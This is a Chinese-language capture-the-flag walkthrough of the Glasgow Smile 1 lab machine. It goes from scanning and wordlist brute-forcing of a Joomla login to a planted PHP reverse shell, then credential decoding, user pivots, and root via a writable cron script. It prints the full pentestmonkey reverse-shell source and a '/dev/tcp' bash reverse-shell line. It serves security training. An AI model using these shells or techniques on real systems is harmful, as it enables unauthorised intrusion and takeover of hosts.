一、信息掃描
1、nmap掃描
┌──(root💀kali)-[~]
└─# nmap -A -p- 10.0.0.34
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-08 07:40 EDT
Nmap scan report for 10.0.0.34
Host is up (0.00038s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 67:34:48:1f:25:0e:d7:b3:ea:bb:36:11:22:60:8f:a1 (RSA)
| 256 4c:8c:45:65:a4:84:e8:b1:50:77:77:a9:3a:96:06:31 (ECDSA)
|_ 256 09:e9:94:23:60:97:f7:20:cc:ee:d6:c1:9b:da:18:8e (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:C2:6D:14 (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.38 ms 10.0.0.34
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.91 seconds
2、dirsearch掃描
┌──(root💀kali)-[~/tools/dirsearch]
└─# python3 dirsearch.py -u http://10.0.0.34
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /root/tools/dirsearch/reports/10.0.0.34/_21-09-08_07-45-58.txt
Error Log: /root/tools/dirsearch/logs/errors-21-09-08_07-45-58.log
Target: http://10.0.0.34/
[07:45:58] Starting:
[07:45:59] 403 - 274B - /.ht_wsr.txt
[07:45:59] 403 - 274B - /.htaccess.bak1
[07:45:59] 403 - 274B - /.htaccess.orig
[07:45:59] 403 - 274B - /.htaccess.sample
[07:45:59] 403 - 274B - /.htaccess_extra
[07:45:59] 403 - 274B - /.htaccessBAK
[07:45:59] 403 - 274B - /.htaccessOLD
[07:45:59] 403 - 274B - /.htaccess_orig
[07:45:59] 403 - 274B - /.htaccess.save
[07:45:59] 403 - 274B - /.htaccess_sc
[07:45:59] 403 - 274B - /.htaccessOLD2
[07:45:59] 403 - 274B - /.htpasswds
[07:45:59] 403 - 274B - /.htm
[07:45:59] 403 - 274B - /.htpasswd_test
[07:45:59] 403 - 274B - /.httr-oauth
[07:45:59] 403 - 274B - /.html
[07:46:00] 403 - 274B - /.php
[07:46:17] 200 - 125B - /index.html
[07:46:18] 301 - 307B - /joomla -> http://10.0.0.34/joomla/
[07:46:18] 301 - 321B - /joomla/administrator -> http://10.0.0.34/joomla/administrator/
[07:46:18] 200 - 10KB - /joomla/
[07:46:27] 403 - 274B - /server-status
[07:46:27] 403 - 274B - /server-status/
Task Completed
┌──(root💀kali)-[~/tools/dirsearch]
└─#
二、密碼暴力破解
1、用cewl生成密碼字典
┌──(root💀kali)-[~/game/glasgow_smile_1]
└─# cewl http://10.0.0.34/joomla -m 5 -d 1 -w joker.txt
CeWL 5.5.2 (Grouping) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
┌──(root💀kali)-[~/game/glasgow_smile_1]
└─# ls
joker.txt
2、用BurpSuite的Intruder模塊進行暴力破解。密碼字典就用剛才生成的joker.txt。
3、破解得到一組密碼:joomla/Gotham
三、漏洞利用
1、登錄后台, 發現有地方可以修改php文件
2、將如下代碼添加到template下的index.php中
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. The author accepts no liability
// for damage caused by this tool. If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
set_time_limit (0);
$VERSION = "1.0";
$ip = '127.0.0.1'; // CHANGE THIS
$port = 1234; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
//
// Daemonise ourself if possible to avoid zombies later
//
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
// Change to a safe directory
chdir("/");
// Remove any umask we inherited
umask(0);
//
// Do the reverse shell...
//
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
// Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
// Wait until a command is end down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
?>
3、保存后,點擊template preview,就可以得到一個shell
┌──(root💀kali)-[~/game/glasgow_smile_1]
└─# nc -vlnp 4444
listening on [any] 4444 ...
connect to [10.0.0.11] from (UNKNOWN) [10.0.0.34] 49012
Linux glasgowsmile 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 GNU/Linux
07:34:12 up 1:22, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@glasgowsmile:/$
四、挖掘信息
1、在系統里看能不能找到有用的文件
www-data@glasgowsmile:/home$ ls
ls
abner penguin rob
www-data@glasgowsmile:/var/www/joomla2$ ls
ls
LICENSE.txt cli includes media tmp
README.txt components index.php modules web.config.txt
administrator configuration.php language plugins
bin htaccess.txt layouts robots.txt
cache images libraries templates
www-data@glasgowsmile:/var/www/joomla2$ cat configuration.php
cat configuration.php
<?php
class JConfig {
public $offline = '0';
# 中間省略
public $dbtype = 'mysqli';
public $host = 'localhost';
public $user = 'joomla';
public $password = 'babyjoker';
public $db = 'joomla_db';
# 后面省略
2、利用這個賬號,在系統里搜索信息
www-data@glasgowsmile:/var/www/joomla2$ mysql -u joomla -p
mysql -u joomla -p
Enter password: babyjoker
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 152
Server version: 10.3.22-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| batjoke |
| information_schema |
| joomla_db |
| mysql |
| performance_schema |
+--------------------+
5 rows in set (0.002 sec)
MariaDB [joomla_db]> use batjoke
use batjoke
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [batjoke]> show tables;
show tables;
+-------------------+
| Tables_in_batjoke |
+-------------------+
| equipment |
| taskforce |
+-------------------+
2 rows in set (0.000 sec)
MariaDB [batjoke]> select * from taskforce;
select * from taskforce;
+----+---------+------------+---------+----------------------------------------------+
| id | type | date | name | pswd |
+----+---------+------------+---------+----------------------------------------------+
| 1 | Soldier | 2020-06-14 | Bane | YmFuZWlzaGVyZQ== |
| 2 | Soldier | 2020-06-14 | Aaron | YWFyb25pc2hlcmU= |
| 3 | Soldier | 2020-06-14 | Carnage | Y2FybmFnZWlzaGVyZQ== |
| 4 | Soldier | 2020-06-14 | buster | YnVzdGVyaXNoZXJlZmY= |
| 6 | Soldier | 2020-06-14 | rob | Pz8/QWxsSUhhdmVBcmVOZWdhdGl2ZVRob3VnaHRzPz8/ |
| 7 | Soldier | 2020-06-14 | aunt | YXVudGlzIHRoZSBmdWNrIGhlcmU= |
+----+---------+------------+---------+----------------------------------------------+
6 rows in set (0.000 sec)
MariaDB [batjoke]>
# 有一個rob的記錄,后面的可能是密碼。但網上的教程里都是怎么知道它是Base64編碼的?可能是經驗吧。
┌──(root💀kali)-[~/tools/dirsearch]
└─# echo 'Pz8/QWxsSUhhdmVBcmVOZWdhdGl2ZVRob3VnaHRzPz8/' |base64 -d
???AllIHaveAreNegativeThoughts??? # 解密后似乎得到了一個密碼,還真夠長的。ssh一下www-data@glasgowsmile:/home$ ssh rob@10.0.0.34
3、ssh后看能不能拿到更大的權限
www-data@glasgowsmile:/home$ ssh rob@10.0.0.34
ssh rob@10.0.0.34
Could not create directory '/var/www/.ssh'.
The authenticity of host '10.0.0.34 (10.0.0.34)' can't be established.
ECDSA key fingerprint is SHA256:05TCY2Nw37yPYIluFAe7y4vTCupftlAxY+jXZsTJu88.
Are you sure you want to continue connecting (yes/no)? yes
yes
Failed to add the host to the list of known hosts (/var/www/.ssh/known_hosts).
rob@10.0.0.34's password: ???AllIHaveAreNegativeThoughts???
Linux glasgowsmile 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jun 16 13:24:25 2020 from 192.168.10.172
rob@glasgowsmile:~$
4、能引起我們注意的也就三個文件
rob@glasgowsmile:~$ ls -al
ls -al
total 52
drwxr-xr-x 3 rob rob 4096 Jun 16 2020 .
drwxr-xr-x 5 root root 4096 Jun 15 2020 ..
-rw-r----- 1 rob rob 454 Jun 14 2020 Abnerineedyourhelp
-rw------- 1 rob rob 7 Sep 7 08:53 .bash_history
-rw-r--r-- 1 rob rob 220 Jun 13 2020 .bash_logout
-rw-r--r-- 1 rob rob 3526 Jun 13 2020 .bashrc
-rw-r----- 1 rob rob 313 Jun 14 2020 howtoberoot
drwxr-xr-x 3 rob rob 4096 Jun 13 2020 .local
-rw------- 1 rob rob 81 Jun 15 2020 .mysql_history
-rw-r--r-- 1 rob rob 807 Jun 13 2020 .profile
-rw-r--r-- 1 rob rob 66 Jun 15 2020 .selected_editor
-rw-r----- 1 rob rob 38 Jun 13 2020 user.txt
-rw------- 1 rob rob 429 Jun 16 2020 .Xauthority
rob@glasgowsmile:~$ cat user.txt
cat user.txt
# 這個暫且不知道有什么用
JKR[f5bb11acbb957915e421d62e7253d27a]
rob@glasgowsmile:~$ cat howtoberoot
cat howtoberoot
_____ ______ __ _ _ _ ____ ____ _____ ____
|_ _| _ \ \ / / | | | | / \ | _ \| _ \| ____| _ \
| | | |_) \ V / | |_| | / _ \ | |_) | | | | _| | |_) |
| | | _ < | | | _ |/ ___ \| _ <| |_| | |___| _ <
|_| |_| \_\|_| |_| |_/_/ \_\_| \_\____/|_____|_| \_\
# 這個是挑逗
NO HINTS.
rob@glasgowsmile:~$ cat Abnerineedyourhelp
cat Abnerineedyourhelp
Gdkkn Cdzq, Zqsgtq rteedqr eqnl rdudqd ldmszk hkkmdrr ats vd rdd khsskd rxlozsgx enq ghr bnmchshnm. Sghr qdkzsdr sn ghr eddkhmf zants adhmf hfmnqdc. Xnt bzm ehmc zm dmsqx hm ghr intqmzk qdzcr, "Sgd vnqrs ozqs ne gzuhmf z ldmszk hkkmdrr hr odnokd dwodbs xnt sn adgzud zr he xnt cnm's."
Mnv H mddc xntq gdko Zamdq, trd sghr ozrrvnqc, xnt vhkk ehmc sgd qhfgs vzx sn rnkud sgd dmhflz. RSLyzF9vYSj5aWjvYFUgcFfvLCAsXVskbyP0aV9xYSgiYV50byZvcFggaiAsdSArzVYkLZ==
rob@glasgowsmile:~$
# 上面這個最后一句明顯是個密碼,需要解密。前面明顯一則加密信息。通過一些短的單詞可以知道就是一個簡單的錯位密碼。比如:z 明顯應該是 a ,才有意義。sn 應該是 to。也就是他偏移了一個字符。全部解密后的信息如下:
Hello Dear, Arthur suffers from severe mental illness but we see little symapthy for his conditions. This relates to his feeling about being ignored. You can find an entry in his journal reads, "The worst part of having a mental illness is people expect you to behave as if you don't."
Now I need your help Abner, use this password, you will find the right way to solve the enigma. STMzaG9wZTk5bXkwZGVhdGgwMDBtYWtlczQ0bW9yZThjZW50czAwdGhhbjBteTBsaWZlMA==
# 經過驗證,這一段密碼也偏移了一個字符。可以寫一段程序,練習一下python.
┌──(root💀kali)-[~/tools/dirsearch]
└─# echo 'STMzaG9wZTk5bXkwZGVhdGgwMDBtYWtlczQ0bW9yZThjZW50czAwdGhhbjBteTBsaWZlMA==' | base64 -d
I33hope99my0death000makes44more8cents00than0my0life0
# 用Abner登錄,賬號一般要小寫
rob@glasgowsmile:~$ su Abner
su Abner
su: user Abner does not exist
rob@glasgowsmile:~$ su abner
su abner
Password: I33hope99my0death000makes44more8cents00than0my0life0
abner@glasgowsmile:/home/rob$
abner@glasgowsmile:~$ ls
ls
info.txt user2.txt
abner@glasgowsmile:~$ cat info.txt
cat info.txt
A Glasgow smile is a wound caused by making a cut from the corners of a victim's mouth up to the ears, leaving a scar in the shape of a smile.
The act is usually performed with a utility knife or a piece of broken glass, leaving a scar which causes the victim to appear to be smiling broadly.
The practice is said to have originated in Glasgow, Scotland in the 1920s and 30s. The attack became popular with English street gangs (especially among the Chelsea Headhunters, a London-based hooligan firm, among whom it is known as a "Chelsea grin" or "Chelsea smile").
abner@glasgowsmile:~$ cat user2.txt
cat user2.txt
JKR{0286c47edc9bfdaf643f5976a8cfbd8d}
# 似乎這個也沒有什么用,現在就只有一個penguin用戶沒信息了!先找找看
abner@glasgowsmile:~$ find / -iname *penguin* 2>/dev/null
find / -iname *penguin* 2>/dev/null
/home/penguin
/var/www/joomla2/administrator/manifests/files/.dear_penguins.zip
# 顯然這個zip文件是重要信息。復制到當前用戶的家目錄下,進行解壓,輸入abner的密碼
abner@glasgowsmile:~$ cp /var/www/joomla2/administrator/manifests/files/.dear_penguins.zip ~ && unzip .dear_penguins.zip
<es/.dear_penguins.zip ~ && unzip .dear_penguins.zip
Archive: .dear_penguins.zip
[.dear_penguins.zip] dear_penguins password: I33hope99my0death000makes44more8cents00than0my0life0
inflating: dear_penguins
abner@glasgowsmile:~$
abner@glasgowsmile:~$ ls
ls
dear_penguins info.txt user2.txt
abner@glasgowsmile:~$ cat dear_penguins
cat dear_penguins
My dear penguins, we stand on a great threshold! It's okay to be scared; many of you won't be coming back. Thanks to Batman, the time has come to punish all of God's children! First, second, third and fourth-born! Why be biased?! Male and female! Hell, the sexes are equal, with their erogenous zones BLOWN SKY-HIGH!!! FORWAAAAAAAAAAAAAARD MARCH!!! THE LIBERATION OF GOTHAM HAS BEGUN!!!!!
scf4W7q4B4caTMRhSFYmktMsn87F35UkmKttM5Bz
abner@glasgowsmile:~$
# 最后一段信息應該是penguin的密碼
5、用penguin用戶登錄
abner@glasgowsmile:~$ su penguin
su penguin
Password: scf4W7q4B4caTMRhSFYmktMsn87F35UkmKttM5Bz
penguin@glasgowsmile:/home/abner$
penguin@glasgowsmile:/home/abner$ id
id
uid=1002(penguin) gid=1002(penguin) groups=1002(penguin)
penguin@glasgowsmile:/home/abner$ cd ~
cd ~
penguin@glasgowsmile:~$ ls
ls
SomeoneWhoHidesBehindAMask
penguin@glasgowsmile:~$ cd SomeoneWhoHidesBehindAMask
cd SomeoneWhoHidesBehindAMask
penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ ls -al
ls -al
total 332
drwxr--r-- 2 penguin penguin 4096 Jun 16 2020 .
drwxr-xr-x 5 penguin penguin 4096 Jun 16 2020 ..
-rwSr----- 1 penguin penguin 315904 Jun 15 2020 find
-rw-r----- 1 penguin root 1457 Jun 15 2020 PeopleAreStartingToNotice.txt
-rwxr-xr-x 1 penguin root 612 Jun 16 2020 .trash_old
-rw-r----- 1 penguin penguin 38 Jun 16 2020 user3.txt
penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ cat user3.txt
cat user3.txt
JKR{284a3753ec11a592ee34098b8cb43d52}
penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ cat PeopleAreStartingToNotice.txt
<HidesBehindAMask$ cat PeopleAreStartingToNotice.txt
Hey Penguin,
I'm writing software, I can't make it work because of a permissions issue. It only runs with root permissions. When it's complete I'll copy it to this folder.
Joker
_____ _____ __ _ __ ________ _____ ________ ______ _____ ____ __ __ ________ _____ _________ __ __ _____ ______
(_ _) / ____\ / \ / ) ( ) (___ ___) (_ _) (___ ___) (_ _ \ / ___/ ( ) ) ) ( ( (___ ___) (_ _) (_ _____) ) ) ( ( (_ _) (_____ \
| | ( (___ / /\ \ / / \/ ) ) | | ) ) ) (_) ) ( (__ / /\ \ ( ( ) ) ) ) | | ) (___ ( ( ) ) | | ___) )
| | \___ \ ) ) ) ) ) ) ( ( | | ( ( \ _/ ) __) ( (__) ) ) ) ( ( ( ( | | ( ___) ) ) ( ( | | ( __/
| | ) ) ( ( ( ( ( ( ) ) | | ) ) / _ \ ( ( ) ( ( ( ) ) ) ) | | ) ( ( ( ) ) | | __ )_)
_| |__ ___/ / / / \ \/ / ( ( _| |__ ( ( _) (_) ) \ \___ / /\ \ ) \__/ ( ( ( _| |__ ( ) ) \__/ ( __| |___) ) __
/_____( /____/ (_/ \__/ /__\ /_____( /__\ (______/ \____\ /__( )__\ \______/ /__\ /_____( \_/ \______/ \________/ (__)
penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ cat .trash_old
cat .trash_old
#/bin/sh
# ( ( ) ( * ( (
# ( )\ ) ( )\ ) ( ( /( ( ( )\ ) ( ` )\ ))\ )
# )\ ) (()/( )\ (()/( )\ ) )\()))\))( ' (()/( )\))( (()/(()/( (
#(()/( /(_)((((_)( /(_)(()/( ((_)\((_)()\ ) /(_)((_)()\ /(_)/(_)))\
# /(_))_(_)) )\ _ )\(_)) /(_))_ ((__(())\_)() (_)) (_()((_(_))(_)) ((_)
#(_)) __| | (_)_\(_/ __|(_)) __|/ _ \ \((_)/ / / __|| \/ |_ _| | | __|
# | (_ | |__ / _ \ \__ \ | (_ | (_) \ \/\/ / \__ \| |\/| || || |__| _|
# \___|____|/_/ \_\|___/ \___|\___/ \_/\_/ |___/|_| |_|___|____|___|
#
#
exit 0
# 這個文件可以編輯,目前還不知道有什么用。
6、嘗試用pspy64看看有什么發現
penguin@glasgowsmile:~$ wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64
<DominicBreuker/pspy/releases/download/v1.2.0/pspy64
--2021-09-08 09:16:11-- https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64
Resolving github.com (github.com)... 20.205.243.166
Connecting to github.com (github.com)|20.205.243.166|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://github-releases.githubusercontent.com/120821432/d54f2200-c51c-11e9-8d82-f178cd27b2cb?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20210908%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20210908T141612Z&X-Amz-Expires=300&X-Amz-Signature=2d9f2dcd75f4dfc47ca4aec4a65c2467be8f59c6599703f17800ffb1f342a6ba&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=120821432&response-content-disposition=attachment%3B%20filename%3Dpspy64&response-content-type=application%2Foctet-stream [following]
--2021-09-08 09:16:12-- https://github-releases.githubusercontent.com/120821432/d54f2200-c51c-11e9-8d82-f178cd27b2cb?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20210908%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20210908T141612Z&X-Amz-Expires=300&X-Amz-Signature=2d9f2dcd75f4dfc47ca4aec4a65c2467be8f59c6599703f17800ffb1f342a6ba&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=120821432&response-content-disposition=attachment%3B%20filename%3Dpspy64&response-content-type=application%2Foctet-stream
Resolving github-releases.githubusercontent.com (github-releases.githubusercontent.com)... 185.199.109.154, 185.199.111.154, 185.199.110.154, ...
Connecting to github-releases.githubusercontent.com (github-releases.githubusercontent.com)|185.199.109.154|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3078592 (2.9M) [application/octet-stream]
Saving to: ‘pspy64’
pspy64 100%[===================>] 2.94M 843KB/s in 3.6s
2021-09-08 09:16:17 (843 KB/s) - ‘pspy64’ saved [3078592/3078592]
penguin@glasgowsmile:~$ chmod +x pspy64
chmod +x pspy64
penguin@glasgowsmile:~$ ./pspy64
./pspy64
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855
██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2021/09/08 09:16:33 CMD: UID=0 PID=91 |
#中間省略很多沒用的
2021/09/08 09:17:01 CMD: UID=0 PID=2163 | /bin/sh -c /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old
2021/09/08 09:17:01 CMD: UID=0 PID=2164 | /bin/sh -c cd / && run-parts --report /etc/cron.hourly
2021/09/08 09:18:01 CMD: UID=0 PID=2165 | /usr/sbin/CRON -f
2021/09/08 09:18:01 CMD: UID=0 PID=2166 | /usr/sbin/CRON -f
2021/09/08 09:18:01 CMD: UID=0 PID=2167 | /bin/sh -c /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old
2021/09/08 09:19:01 CMD: UID=0 PID=2168 | /usr/sbin/CRON -f
2021/09/08 09:19:01 CMD: UID=0 PID=2169 | /usr/sbin/CRON -f
2021/09/08 09:19:01 CMD: UID=0 PID=2170 | /bin/sh -c /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old
2021/09/08 09:20:01 CMD: UID=0 PID=2171 | /usr/sbin/CRON -f
2021/09/08 09:20:01 CMD: UID=0 PID=2172 | /usr/sbin/CRON -f
2021/09/08 09:20:01 CMD: UID=0 PID=2173 | /bin/sh -c /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old
# 前面發現這個.trash_old是可以編輯的,並且他還每分鍾運行一次!那就用他來反彈shell。
7、反彈 shell
- 主要就是想辦法把
bash -c 'bash -i >& /dev/tcp/10.0.0.11/7777 0>&1'這段代碼寫進.trash_old文件
penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ echo "#/bin/sh">.trash_old
penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ cat .trash_old
cat .trash_old
#/bin/sh
penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ echo "bash -c 'bash -i >& /dev/tcp/10.0.0.11/7777 0>&1'" >> .trash_old
penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$
penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ cat .trash_old
cat .trash_old
#/bin/sh
bash -c 'bash -i >& /dev/tcp/10.0.0.11/7777 0>&1'
# 寫完之后,靜靜等待一分鍾
- 一分鍾后,計划任務程序會自動運行.trash_old
┌──(root💀kali)-[~]
└─# nc -vlnp 7777
listening on [any] 7777 ...
connect to [10.0.0.11] from (UNKNOWN) [10.0.0.34] 51098
bash: cannot set terminal process group (2441): Inappropriate ioctl for device
bash: no job control in this shell
root@glasgowsmile:~# ls
ls
root.txt
whoami
root@glasgowsmile:~# cat root.txt
cat root.txt
▄████ ██▓ ▄▄▄ ██████ ▄████ ▒█████ █ █░ ██████ ███▄ ▄███▓██▓██▓ ▓█████
██▒ ▀█▓██▒ ▒████▄ ▒██ ▒ ██▒ ▀█▒██▒ ██▓█░ █ ░█░ ▒██ ▒▓██▒▀█▀ ██▓██▓██▒ ▓█ ▀
▒██░▄▄▄▒██░ ▒██ ▀█▄ ░ ▓██▄ ▒██░▄▄▄▒██░ ██▒█░ █ ░█ ░ ▓██▄ ▓██ ▓██▒██▒██░ ▒███
░▓█ ██▒██░ ░██▄▄▄▄██ ▒ ██░▓█ ██▒██ ██░█░ █ ░█ ▒ ██▒██ ▒██░██▒██░ ▒▓█ ▄
░▒▓███▀░██████▓█ ▓██▒██████▒░▒▓███▀░ ████▓▒░░██▒██▓ ▒██████▒▒██▒ ░██░██░██████░▒████▒
░▒ ▒░ ▒░▓ ▒▒ ▓▒█▒ ▒▓▒ ▒ ░░▒ ▒░ ▒░▒░▒░░ ▓░▒ ▒ ▒ ▒▓▒ ▒ ░ ▒░ ░ ░▓ ░ ▒░▓ ░░ ▒░ ░
░ ░░ ░ ▒ ░▒ ▒▒ ░ ░▒ ░ ░ ░ ░ ░ ▒ ▒░ ▒ ░ ░ ░ ░▒ ░ ░ ░ ░▒ ░ ░ ▒ ░░ ░ ░
░ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ░
░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
Congratulations!
You've got the Glasgow Smile!
JKR{68028b11a1b7d56c521a90fc18252995}
Credits by
mindsflee
root@glasgowsmile:~#
